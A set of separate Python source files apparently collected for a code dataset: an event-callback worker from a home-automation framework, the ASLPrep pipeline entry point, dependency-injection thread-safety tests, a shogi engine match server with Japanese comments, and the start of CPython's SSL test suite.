"name": name,
"objectid": self.AD.app_management.objects[name]["id"],
"type": "state",
"function": funcref,
"attribute": attribute,
"entity": entity,
"new_state": new,
"old_state": old,
"pin_app": pin_app,
"pin_thread": pin_thread,
"kwargs": kwargs
})
return executed
async def dispatch_worker(self, name, args):
unconstrained = True
#
# Argument Constraints
#
for arg in self.AD.app_management.app_config[name].keys():
constrained = await self.check_constraint(arg, self.AD.app_management.app_config[name][arg], self.AD.app_management.objects[name]["object"])
if not constrained:
unconstrained = False
if not await self.check_time_constraint(self.AD.app_management.app_config[name], name):
unconstrained = False
elif not await self.check_days_constraint(self.AD.app_management.app_config[name], name):
unconstrained = False
#
# Callback level constraints
#
myargs = utils.deepcopy(args)
if "kwargs" in myargs:
for arg in myargs["kwargs"].keys():
constrained = await self.check_constraint(arg, myargs["kwargs"][arg], self.AD.app_management.objects[name]["object"])
if not constrained:
unconstrained = False
if not await self.check_time_constraint(myargs["kwargs"], name):
unconstrained = False
elif not await self.check_days_constraint(myargs["kwargs"], name):
unconstrained = False
if unconstrained:
#
# It's going to happen
#
await self.add_to_state("_threading", "admin", "sensor.callbacks_total_fired", 1)
await self.add_to_attr("_threading", "admin", "{}_callback.{}".format(myargs["type"], myargs["id"]), "fired", 1)
#
# And Q
#
if asyncio.iscoroutinefunction(myargs["function"]):
f = asyncio.ensure_future(self.async_worker(myargs))
self.AD.futures.add_future(name, f)
else:
self.select_q(myargs)
return True
else:
return False
# noinspection PyBroadException
async def async_worker(self, args):
thread_id = threading.current_thread().name
_type = args["type"]
funcref = args["function"]
_id = args["id"]
objectid = args["objectid"]
name = args["name"]
error_logger = logging.getLogger("Error.{}".format(name))
args["kwargs"]["__thread_id"] = thread_id
callback = "{}() in {}".format(funcref.__name__, name)
app = await self.AD.app_management.get_app_instance(name, objectid)
if app is not None:
try:
if _type == "scheduler":
try:
await self.update_thread_info("async", callback, name, _type, _id)
await funcref(self.AD.sched.sanitize_timer_kwargs(app, args["kwargs"]))
except TypeError as e:
self.report_callback_sig(name, "scheduler", funcref, args)
elif _type == "state":
try:
entity = args["entity"]
attr = args["attribute"]
old_state = args["old_state"]
new_state = args["new_state"]
await self.update_thread_info("async", callback, name, _type, _id)
await funcref(entity, attr, old_state, new_state, self.AD.state.sanitize_state_kwargs(app, args["kwargs"]))
except TypeError as e:
self.report_callback_sig(name, "state", funcref, args)
elif _type == "event":
data = args["data"]
if args["event"] == "__AD_LOG_EVENT":
try:
await self.update_thread_info("async", callback, name, _type, _id)
await funcref(data["app_name"], data["ts"], data["level"], data["log_type"], data["message"], args["kwargs"])
except TypeError as e:
self.report_callback_sig(name, "log_event", funcref, args)
else:
try:
await self.update_thread_info("async", callback, name, _type, _id)
await funcref(args["event"], data, args["kwargs"])
except TypeError as e:
self.report_callback_sig(name, "event", funcref, args)
except:
error_logger.warning('-' * 60)
error_logger.warning("Unexpected error in worker for App %s:", name)
error_logger.warning( "Worker Ags: %s", args)
error_logger.warning('-' * 60)
error_logger.warning(traceback.format_exc())
error_logger.warning('-' * 60)
if self.AD.logging.separate_error_log() is True:
self.logger.warning("Logged an error to %s", self.AD.logging.get_filename("error_log"))
finally:
pass
await self.update_thread_info("async", "idle", name, _type, _id)
else:
if not self.AD.stopping:
self.logger.warning("Found stale callback for %s - discarding", name)
# noinspection PyBroadException
def worker(self):
thread_id = threading.current_thread().name
q = self.get_q(thread_id)
while True:
args = q.get()
_type = args["type"]
funcref = args["function"]
_id = args["id"]
objectid = args["objectid"]
name = args["name"]
error_logger = logging.getLogger("Error.{}".format(name))
args["kwargs"]["__thread_id"] = thread_id
callback = "{}() in {}".format(funcref.__name__, name)
app = utils.run_coroutine_threadsafe(self, self.AD.app_management.get_app_instance(name, objectid))
if app is not None:
try:
if _type == "scheduler":
try:
utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
funcref(self.AD.sched.sanitize_timer_kwargs(app, args["kwargs"]))
except TypeError:
self.report_callback_sig(name, "scheduler", funcref, args)
elif _type == "state":
try:
entity = args["entity"]
attr = args["attribute"]
old_state = args["old_state"]
new_state = args["new_state"]
utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
funcref(entity, attr, old_state, new_state,
self.AD.state.sanitize_state_kwargs(app, args["kwargs"]))
except TypeError:
self.report_callback_sig(name, "state", funcref, args)
elif _type == "event":
data = args["data"]
if args["event"] == "__AD_LOG_EVENT":
try:
utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
funcref(data["app_name"], data["ts"], data["level"], data["log_type"], data["message"], args["kwargs"])
except TypeError:
self.report_callback_sig(name, "log_event", funcref, args)
else:
try:
utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, callback, name, _type, _id))
funcref(args["event"], data, args["kwargs"])
except TypeError:
self.report_callback_sig(name, "event", funcref, args)
except:
error_logger.warning('-' * 60)
error_logger.warning("Unexpected error in worker for App %s:", name)
error_logger.warning( "Worker Ags: %s", args)
error_logger.warning('-' * 60)
error_logger.warning(traceback.format_exc())
error_logger.warning('-' * 60)
if self.AD.logging.separate_error_log() is True:
self.logger.warning("Logged an error to %s", self.AD.logging.get_filename("error_log"))
finally:
utils.run_coroutine_threadsafe(self, self.update_thread_info(thread_id, "idle", name, _type, _id))
else:
if not self.AD.stopping:
self.logger.warning("Found stale callback for %s - discarding", name)
q.task_done()
def report_callback_sig(self, name, type, funcref, args):
callback_args = {
"scheduler": {"count": 1, "signature": "f(self, kwargs)"},
"state": {"count": 5, "signature": "f(self, entity, attribute, old, new, kwargs)"},
"event": {"count": 3, "signature": "f(self, event, data, kwargs)"},
"log_event": {"count": 6, "signature": "f(self, name, ts, level, type, message, kwargs)"},
"initialize": {"count": 0, "signature": "initialize()"},
"terminate": {"count": 0, "signature": "terminate()"}
}
sig = inspect.signature(funcref)
if type in callback_args:
if len(sig.parameters) != callback_args[type]["count"]:
self.logger.warning("Suspect incorrect signature type for callback %s() in %s, should be %s - discarding", funcref.__name__, name, callback_args[type]["signature"])
error_logger = logging.getLogger("Error.{}".format(name))
error_logger.warning('-' * 60)
error_logger.warning("Unexpected error in worker for App %s:", name)
error_logger.warning("Worker Ags: %s", args)
error_logger.warning('-' * 60)
error_logger.warning(traceback.format_exc())
error_logger.warning('-' * 60)
if self.AD.logging.separate_error_log() is True:
self.logger.warning("Logged an error to %s", self.AD.logging.get_filename("error_log"))
else:
self.logger.error("Unknown callback type: %s", type)
|
run.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""ASL preprocessing workflow."""
from .. import config
def main():
"""Entry point."""
from os import EX_SOFTWARE
from pathlib import Path
import sys
import gc
from multiprocessing import Process, Manager
from .parser import parse_args
from ..utils.bids import write_derivative_description
parse_args()
sentry_sdk = None
if not config.execution.notrack:
import sentry_sdk
from ..utils.sentry import sentry_setup
sentry_setup()
# CRITICAL Save the config to a file. This is necessary because the execution graph
# is built as a separate process to keep the memory footprint low. The most
# straightforward way to communicate with the child process is via the filesystem.
config_file = config.execution.work_dir / f"config-{config.execution.run_uuid}.toml"
config.to_filename(config_file)
# CRITICAL Call build_workflow(config_file, retval) in a subprocess.
# Because Python on Linux does not ever free virtual memory (VM), running the
# workflow construction jailed within a process preempts excessive VM buildup.
with Manager() as mgr:
from .workflow import build_workflow
retval = mgr.dict()
p = Process(target=build_workflow, args=(str(config_file), retval))
p.start()
p.join()
retcode = p.exitcode or retval.get("return_code", 0)
aslprep_wf = retval.get("workflow", None)
# CRITICAL Load the config from the file. This is necessary because the ``build_workflow``
# function executed constrained in a process may change the config (and thus the global
# state of ASLPrep).
config.load(config_file)
if config.execution.reports_only:
sys.exit(int(retcode > 0))
if aslprep_wf and config.execution.write_graph:
aslprep_wf.write_graph(graph2use="colored", format="svg", simple_form=True)
retcode = retcode or (aslprep_wf is None) * EX_SOFTWARE
if retcode != 0:
sys.exit(retcode)
# Generate boilerplate
with Manager() as mgr:
from .workflow import build_boilerplate
p = Process(target=build_boilerplate, args=(str(config_file), aslprep_wf))
p.start()
p.join()
if config.execution.boilerplate_only:
sys.exit(int(retcode > 0))
# Clean up master process before running workflow, which may create forks
gc.collect()
# Sentry tracking
if sentry_sdk is not None:
with sentry_sdk.configure_scope() as scope:
scope.set_tag("run_uuid", config.execution.run_uuid)
scope.set_tag("npart", len(config.execution.participant_label))
sentry_sdk.add_breadcrumb(message="ASLPrep started", level="info")
sentry_sdk.capture_message("ASLPrep started", level="info")
config.loggers.workflow.log(
15,
"\n".join(
["ASLPrep config:"] + ["\t\t%s" % s for s in config.dumps().splitlines()]
),
)
config.loggers.workflow.log(25, "ASLPrep started!")
errno = 1 # Default is error exit unless otherwise set
try:
aslprep_wf.run(**config.nipype.get_plugin())
except Exception as e:
if not config.execution.notrack:
from ..utils.sentry import process_crashfile
crashfolders = [
config.execution.output_dir
/ "aslprep"
/ "sub-{}".format(s)
/ "log"
/ config.execution.run_uuid
for s in config.execution.participant_label
]
for crashfolder in crashfolders:
for crashfile in crashfolder.glob("crash*.*"):
process_crashfile(crashfile)
if "Workflow did not execute cleanly" not in str(e):
sentry_sdk.capture_exception(e)
config.loggers.workflow.critical("ASLPrep failed: %s", e)
raise
else:
config.loggers.workflow.log(25, "ASLPrep finished successfully!")
if not config.execution.notrack:
success_message = "ASLPrep finished without errors"
sentry_sdk.add_breadcrumb(message=success_message, level="info")
sentry_sdk.capture_message(success_message, level="info")
# Bother users with the boilerplate only iff the workflow went okay.
boiler_file = config.execution.output_dir / "aslprep" / "logs" / "CITATION.md"
if boiler_file.exists():
if config.environment.exec_env in (
"singularity",
"docker",
"aslprep-docker",
):
boiler_file = Path("<OUTPUT_PATH>") / boiler_file.relative_to(
config.execution.output_dir
)
config.loggers.workflow.log(
25,
"Works derived from this ASLPrep execution should include the "
f"boilerplate text found in {boiler_file}.",
)
errno = 0
finally:
from ..niworkflows.reports import generate_reports
from pkg_resources import resource_filename as pkgrf
# Generate reports phase
failed_reports = generate_reports(
config.execution.participant_label,
config.execution.output_dir,
config.execution.run_uuid,
config=pkgrf("aslprep", "data/reports-spec.yml"),
packagename="aslprep",
)
write_derivative_description(
config.execution.bids_dir, config.execution.output_dir / "aslprep"
)
if failed_reports and not config.execution.notrack:
sentry_sdk.capture_message(
"Report generation failed for %d subjects" % failed_reports,
level="error",
)
sys.exit(int((errno + failed_reports) > 0))
if __name__ == "__main__":
raise RuntimeError(
"aslprep/cli/run.py should not be run directly;\n"
"Please `pip install` aslprep and use the `aslprep` command"
)
|
test_thread_safety.py
|
import random
import threading
import time
from typing import Callable
from antidote import factory, world
from antidote.core import Container
class A:
pass
class B:
pass
class ThreadSafetyTest:
n_threads = 10
__state = None
@classmethod
def run(cls, target: Callable[[], object], n_threads=None):
threads = [threading.Thread(target=target) for _ in range(n_threads or cls.n_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
@staticmethod
def random_delay(a=0.01, b=None):
b = b or a
time.sleep(a + b * random.random())
@staticmethod
def unique_id():
return threading.get_ident(), random.random()
@classmethod
def check_locked(cls, failures: list):
tid = ThreadSafetyTest.unique_id()
cls.__state = tid
ThreadSafetyTest.random_delay()
if cls.__state != tid:
failures.append(1)
def delayed_new_class(cls):
def f() -> cls:
ThreadSafetyTest.random_delay()
return cls()
return f
def test_container_instantiation_safety():
with world.test.new():
build_a = factory(delayed_new_class(A), singleton=True)
build_b = factory(delayed_new_class(B), singleton=False)
singleton_got = []
non_singleton_got = []
def worker():
singleton_got.append(world.get(A @ build_a))
non_singleton_got.append(world.get(B @ build_b))
ThreadSafetyTest.run(worker)
assert len(set(singleton_got)) == 1
assert len(set(non_singleton_got)) == ThreadSafetyTest.n_threads
# Be sure not have used a fixture to create a new test world as it will
# interfere with this test.
def test_world_safety():
singletons = []
def worker():
with world.test.empty():
tid = ThreadSafetyTest.unique_id()
world.test.singleton("x", tid)
ThreadSafetyTest.random_delay()
singletons.append((tid, tid == world.get("x")))
ThreadSafetyTest.run(worker)
assert ThreadSafetyTest.n_threads == len({tid for (tid, _) in singletons})
assert all(equal for (_, equal) in singletons)
def test_state_init_safety():
from antidote._internal import state
from antidote._internal import world as world_utils
old_new_container = world_utils.new_container
called = 0
def new_container():
nonlocal called
called += 1
ThreadSafetyTest.random_delay()
return old_new_container()
state.reset()
world_utils.new_container = new_container
try:
ThreadSafetyTest.run(state.init)
finally:
world_utils.new_container = old_new_container
assert state.current_container() is not None
assert called == 1
def test_state_override_safety():
from antidote._internal import state
state.init()
container = state.current_container()
def create(c):
assert c is container
return Container()
def worker():
ThreadSafetyTest.random_delay()
state.override(create)
ThreadSafetyTest.run(worker)
|
server.py
|
import time
import threading
from src.engine.engine import UsiEngine
from src.engine.enums import Turn
from src.engine.game_result import GameResult
from src.engine.scanner import Scanner
# 1対1での対局を管理してくれる補助クラス
class AyaneruServer:
def __init__(self):
# --- public members ---
# 1P側、2P側のエンジンを生成して代入する。
# デフォルトでは先手が1P側、後手が2P側になる。
# self.flip_turn == Trueのときはこれが反転する。
# ※ 与えた開始局面のsfenが先手番から始まるとは限らないので注意。
self.engines = [UsiEngine(), UsiEngine()]
# デフォルト、0.1秒対局
self.set_time_setting("byoyomi 100")
# 引き分けとなる手数(これはユーザー側で変更して良い)
self.moves_to_draw = 320
# 先後プレイヤーを入れ替える機能。
# self.engine(Turn)でエンジンを取得するときに利いてくる。
# False : 1P = 先手 , 2P = 後手
# True : 1P = 後手 , 2P = 先手
self.flip_turn = False
# これをgame_start()呼び出し前にTrueにしておくと、エンジンの通信内容が標準出力に出力される。
self.debug_print = False
# これをgame_start()呼び出し前にTrueにしておくと、エンジンから"Error xxx"と送られてきたときにその内容が標準出力に出力される。
self.error_print = False
# --- publc readonly members
# 現在の手番側
self.side_to_move = Turn.BLACK
# 現在の局面のsfen("startpos moves ..."や、"sfen ... move ..."の形)
self.sfen = "startpos"
# 初期局面からの手数
self.game_ply = 1
# 現在のゲーム状態
# ゲームが終了したら、game_result.is_gameover() == Trueになる。
self.game_result = GameResult.INIT
# --- private memebers ---
# 持ち時間残り [1P側 , 2P側] 単位はms。
self.rest_time = [0, 0]
# 対局の持ち時間設定
# self.set_time_setting()で渡されたものをparseしたもの。
self.time_setting = {}
# 対局用スレッド
self.game_thread: threading.Thread = None
# 対局用スレッドの強制停止フラグ
self.stop_thread: threading.Thread = False
# turn側のplayer番号を取得する。(flip_turnを考慮する。)
# 返し値
# 0 : 1P側
# 1 : 2P側
def player_number(self, turn: Turn) -> int:
if self.flip_turn:
turn = turn.flip()
return int(turn)
# turn側のplayer名を取得する。(flip_turnを考慮する)
# "1p" , "2p"という文字列が返る。
def player_str(self, turn: Turn) -> str:
return str(self.player_number(turn) + 1) + "p"
# turn手番側のエンジンを取得する
# flip_turn == Trueのときは、先手側がengines[1]、後手側がengines[0]になるので注意。
def engine(self, turn: Turn) -> UsiEngine:
return self.engines[self.player_number(turn)]
# turn手番側の持ち時間の残り。
# self.rest_timeはflip_turnの影響を受ける。
def get_rest_time(self, turn: Turn) -> int:
return self.rest_time[self.player_number(turn)]
# 持ち時間設定を行う
# time = 先後の持ち時間[ms]
# time1p = 1p側 持ち時間[ms](1p側だけ個別に設定したいとき)
# time2p = 2p側 持ち時間[ms](2p側だけ個別に設定したいとき)
# byoyomi = 秒読み[ms]
# byoyomi1p = 1p側秒読み[ms]
# byoyomi2p = 2p側秒読み[ms]
# inc = 1手ごとの加算[ms]
# inc1p = 1p側のinc[ms]
# inc2p = 2p側のinc[ms]
#
# 例 : "byoyomi 100" : 1手0.1秒
# 例 : "time 900000" : 15分
# 例 : "time1p 900000 time2p 900000 byoyomi 5000" : 15分 + 秒読み5秒
# 例 : "time1p 10000 time2p 10000 inc 5000" : 10秒 + 1手ごとに5秒加算
# 例 : "time1p 10000 time2p 10000 inc1p 5000 inc2p 1000" : 10秒 + 先手1手ごとに5秒、後手1手ごとに1秒加算
def set_time_setting(self, setting: str):
scanner = Scanner(setting.split())
tokens = [
"time",
"time1p",
"time2p",
"byoyomi",
"byoyomi1p",
"byoyomi2p",
"inc",
"inc1p",
"inc2p",
]
time_setting = {}
while not scanner.is_eof():
token = scanner.get_token()
param = scanner.get_token()
# 使えない指定がないかのチェック
if not token in tokens:
raise ValueError("invalid token : " + token)
int_param = int(param)
time_setting[token] = int_param
# "byoyomi"は"byoyomi1p","byoyomi2p"に敷衍する。("time" , "inc"も同様)
for s in ["time", "byoyomi", "inc"]:
if s in time_setting:
inc_param = time_setting[s]
time_setting[s + "1p"] = inc_param
time_setting[s + "2p"] = inc_param
# 0になっている項目があるとややこしいので0埋めしておく。
for token in tokens:
if not token in time_setting:
time_setting[token] = 0
self.time_setting = time_setting
# ゲームを初期化して、対局を開始する。
# エンジンはconnectされているものとする。
# あとは勝手に思考する。
# ゲームが終了するなどしたらgame_resultの値がINIT,PLAYINGから変化する。
# そのあとself.sfenを取得すればそれが対局棋譜。
# start_sfen : 開始局面をsfen形式で。省略すると平手の開始局面。
# 例 : "startpos" , "startpos moves 7f7g" , "sfen ..." , "sfen ... moves ..."など。
# start_gameply : start_sfenの開始手数。0を指定すると末尾の局面から。
def game_start(self, start_sfen: str = "startpos", start_gameply: int = 0):
# ゲーム対局中ではないか?これは前提条件の違反
if self.game_result == GameResult.PLAYING:
raise ValueError("must be gameover.")
# 局面の設定
sfen = start_sfen
if "moves" not in sfen:
sfen += " moves"
# 開始手数。0なら無視(末尾の局面からなので)
if start_gameply != 0:
sp = sfen.split()
# "moves"の文字列は上で追加しているので必ず存在すると仮定できる。
index = min(sp.index("moves") + start_gameply - 1, len(sp) - 1)
# sp[0]からsp[index]までの文字列を連結する。
sfen = " ".join(sp[0 : index + 1])
self.sfen = sfen
for engine in self.engines:
if not engine.is_connected():
raise ValueError("engine is not connected.")
engine.debug_print = self.debug_print
engine.error_print = self.error_print
# 1P側のエンジンを使って、現局面の手番を得る。
self.side_to_move = self.engines[0].get_side_to_move()
self.game_ply = 1
self.game_result = GameResult.PLAYING
for engine in self.engines:
engine.send_command("usinewgame") # いまから対局はじまるよー
# 開始時 持ち時間
self.rest_time = [
self.time_setting["time1p"],
self.time_setting["time2p"],
]
# 対局用のスレッドを作成するのがお手軽か..
self.game_thread = threading.Thread(target=self.game_worker)
self.game_thread.start()
# 対局スレッド
def game_worker(self):
while self.game_ply < self.moves_to_draw:
# 手番側に属するエンジンを取得する
# ※ flip_turn == Trueのときは相手番のほうのエンジンを取得するので注意。
engine = self.engine(self.side_to_move)
engine.usi_position(self.sfen)
# 現在の手番側["1p" or "2p]の時間設定
byoyomi_str = "byoyomi" + self.player_str(self.side_to_move)
inctime_str = "inc" + self.player_str(self.side_to_move)
inctime = self.time_setting[inctime_str]
# inctimeが指定されていないならbyoymiを付与
if inctime == 0:
byoyomi_or_inctime_str = "byoyomi {0}".format(
self.time_setting[byoyomi_str]
)
else:
byoyomi_or_inctime_str = "binc {0} winc {1}".format(
self.time_setting["inc" + self.player_str(Turn.BLACK)],
self.time_setting["inc" + self.player_str(Turn.WHITE)],
)
start_time = time.time()
engine.usi_go_and_wait_bestmove(
f"btime {self.get_rest_time(Turn.BLACK)} wtime {self.get_rest_time(Turn.WHITE)} {byoyomi_or_inctime_str}"
)
end_time = time.time()
# 使用した時間を1秒単位で繰り上げて、残り時間から減算
# プロセス間の通信遅延を考慮して300[ms]ほど引いておく。(秒読みの場合、どうせ使い切るので問題ないはず..)
# 0.3秒以内に指すと0秒で指したことになるけど、いまのエンジン、詰みを発見したとき以外そういう挙動にはなりにくいのでまあいいや。
elapsed_time = (end_time - start_time) - 0.3 # [ms]に変換
elapsed_time = int(elapsed_time + 0.999) * 1000
if elapsed_time < 0:
elapsed_time = 0
# 現在の手番を数値化したもの。1P側=0 , 2P側=1
int_turn = self.player_number(self.side_to_move)
self.rest_time[int_turn] -= int(elapsed_time)
if (
self.rest_time[int_turn] + self.time_setting[byoyomi_str] < -2000
): # 秒読み含めて-2秒より減っていたら。0.1秒対局とかもあるので1秒繰り上げで引いていくとおかしくなる。
self.game_result = GameResult.from_win_turn(self.side_to_move.flip())
self.game_over()
# 本来、自己対局では時間切れになってはならない。(計測が不確かになる)
# 警告を表示しておく。
print("Error! : player timeup")
return
# 残り時間がマイナスになっていたら0に戻しておく。
if self.rest_time[int_turn] < 0:
self.rest_time[int_turn] = 0
bestmove = engine.think_result.bestmove
if bestmove == "resign":
# 相手番の勝利
self.game_result = GameResult.from_win_turn(self.side_to_move.flip())
self.game_over()
return
if bestmove == "win":
# 宣言勝ち(手番側の勝ち)
# 局面はノーチェックだが、まあエンジン側がバグっていなければこれでいいだろう)
self.game_result = GameResult.from_win_turn(self.side_to_move)
self.game_over()
return
self.sfen = self.sfen + " " + bestmove
self.game_ply += 1
# inctime分、時間を加算
self.rest_time[int_turn] += inctime
self.side_to_move = self.side_to_move.flip()
# 千日手引き分けを処理しないといけないが、ここで判定するのは難しいので
# max_movesで抜けることを期待。
if self.stop_thread:
# 強制停止なので試合内容は保証されない
self.game_result = GameResult.STOP_GAME
return
# 引き分けで終了
self.game_result = GameResult.MAX_MOVES
self.game_over()
# ゲームオーバーの処理
# エンジンに対してゲームオーバーのメッセージを送信する。
def game_over(self):
result = self.game_result
if result.is_draw():
for engine in self.engines:
engine.send_command("gameover draw")
elif result.is_black_or_white_win():
# resultをそのままintに変換したほうの手番側が勝利
self.engine(Turn(result)).send_command("gameover win")
self.engine(Turn(result).flip()).send_command("gameover lose")
else:
# それ以外サポートしてない
raise ValueError("illegal result")
# エンジンを終了させるなどの後処理を行う
def terminate(self):
self.stop_thread = True
self.game_thread.join()
for engine in self.engines:
engine.disconnect()
# エンジンを終了させる
def __del__(self):
self.terminate()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNING_CA = data_file("pycacert.pem")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
REMOTE_ROOT_CERT = data_file("selfsigned_pythontestdotnet.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Aug 26 14:23:15 2028 GMT'))
self.assertEqual(p['notBefore'], asn1time('Aug 29 14:23:15 2018 GMT'))
self.assertEqual(p['serialNumber'], '98A7CF88C74A32ED')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
